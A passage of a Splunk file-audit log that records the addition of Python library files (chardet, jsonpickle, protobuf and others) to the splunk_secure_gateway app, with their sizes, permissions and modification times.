mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:22.084, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__init__.pyi", isdir=0, size=12986, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__init__.py", isdir=0, size=1568, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.875, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/top_level.txt", isdir=0, size=21, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.869, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.865, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/RECORD", isdir=0, size=1428, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.856, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/METADATA", isdir=0, size=408, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.848, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout/__pycache__/__init__.cpython-37.pyc", isdir=0, size=3428, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:21.744, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout/py.typed", isdir=0, size=11, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.740, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:21.736, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout/__init__.py", isdir=0, size=3654, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.729, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/top_level.txt", isdir=0, size=16, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.719, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.715, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.711, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/RECORD", isdir=0, size=2790, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.707, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/METADATA", isdir=0, size=403, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.703, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.699, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/top_level.txt", isdir=0, size=10, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.695, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.691, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.688, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/RECORD", isdir=0, size=4669, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.677, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/METADATA", isdir=0, size=741, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.671, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/metadata/languages.py", isdir=0, size=19474, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/metadata/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/cli/chardetect.py", isdir=0, size=2711, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.555, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/cli/__init__.py", isdir=0, size=1, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/version.py", isdir=0, size=242, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.548, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/utf8prober.py", isdir=0, size=2766, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.544, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/universaldetector.py", isdir=0, size=12503, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/sjisprober.py", isdir=0, size=3774, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.535, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/sbcsgroupprober.py", isdir=0, size=4309, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.531, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/sbcharsetprober.py", isdir=0, size=6136, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.528, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:21.524, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/mbcssm.py", isdir=0, size=25481, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.521, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/mbcsgroupprober.py", isdir=0, size=2012, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.518, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/mbcharsetprober.py", isdir=0, size=3413, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.513, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/latin1prober.py", isdir=0, size=5370, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.509, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langturkishmodel.py", isdir=0, size=95934, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.505, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langthaimodel.py", isdir=0, size=103300, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.502, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langrussianmodel.py", isdir=0, size=131168, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langhungarianmodel.py", isdir=0, size=102486, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.493, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langhebrewmodel.py", isdir=0, size=98764, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.487, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langgreekmodel.py", isdir=0, size=99559, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.483, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/langbulgarianmodel.py", isdir=0, size=105685, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/jpcntx.py", isdir=0, size=19643, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.475, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/jisfreq.py", isdir=0, size=25777, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/hebrewprober.py", isdir=0, size=13838, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/gb2312prober.py", isdir=0, size=1754, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/gb2312freq.py", isdir=0, size=20715, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.457, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/euctwprober.py", isdir=0, size=1747, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.452, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/euctwfreq.py", isdir=0, size=31621, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/euckrprober.py", isdir=0, size=1748, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.441, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/euckrfreq.py", isdir=0, size=13546, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/eucjpprober.py", isdir=0, size=3749, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/escsm.py", isdir=0, size=10510, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/escprober.py", isdir=0, size=3950, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/enums.py", isdir=0, size=1661, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.418, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/cp949prober.py", isdir=0, size=1855, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.414, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/compat.py", isdir=0, size=1200, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.410, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/codingstatemachine.py", isdir=0, size=3590, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.405, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/cli", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:21.401, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/charsetprober.py", isdir=0, size=5110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.397, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/charsetgroupprober.py", isdir=0, size=3839, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.393, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/chardistribution.py", isdir=0, size=9411, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.389, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/big5prober.py", isdir=0, size=1757, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.385, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/big5freq.py", isdir=0, size=31254, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:21.381, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet/__init__.py", isdir=0, size=3271, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/version.cpython-37.pyc", isdir=0, size=609, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/util.cpython-37.pyc", isdir=0, size=13297, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.965, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/unpickler.cpython-37.pyc", isdir=0, size=20317, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.961, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/tags.cpython-37.pyc", isdir=0, size=1105, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.957, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/pickler.cpython-37.pyc", isdir=0, size=18884, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/handlers.cpython-37.pyc", isdir=0, size=10732, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/compat.cpython-37.pyc", isdir=0, size=1099, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/backend.cpython-37.pyc", isdir=0, size=8621, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.938, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__/__init__.cpython-37.pyc", isdir=0, size=2162, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.833, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/ext/pandas.py", isdir=0, size=8008, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.828, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/ext/numpy.py", isdir=0, size=12918, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.823, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/ext/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.819, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/version.py", isdir=0, size=448, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.816, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/util.py", isdir=0, size=14515, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.812, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/unpickler.py", isdir=0, size=25825, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.808, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/tags.py", isdir=0, size=986, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.804, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/pickler.py", isdir=0, size=26523, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.800, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/handlers.py", isdir=0, size=8460, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.797, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/ext", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:20.793, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/compat.py", isdir=0, size=1025, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/backend.py", isdir=0, size=10312, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle/__init__.py", isdir=0, size=2585, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.676, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/LICENSES/Apache-2.0.txt", isdir=0, size=10343, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.672, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/WHEEL", isdir=0, size=87, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.664, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.657, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/RECORD", isdir=0, size=4057, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.650, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/METADATA", isdir=0, size=997, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/LICENSES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:20.642, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/LICENSE", isdir=0, size=11412, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.639, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.535, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/top_level.txt", isdir=0, size=7, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.530, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/namespace_packages.txt", isdir=0, size=7, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/WHEEL", isdir=0, size=109, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.522, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.519, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/RECORD", isdir=0, size=16811, gid=41812, uid=41812, modtime="Fri Apr 2 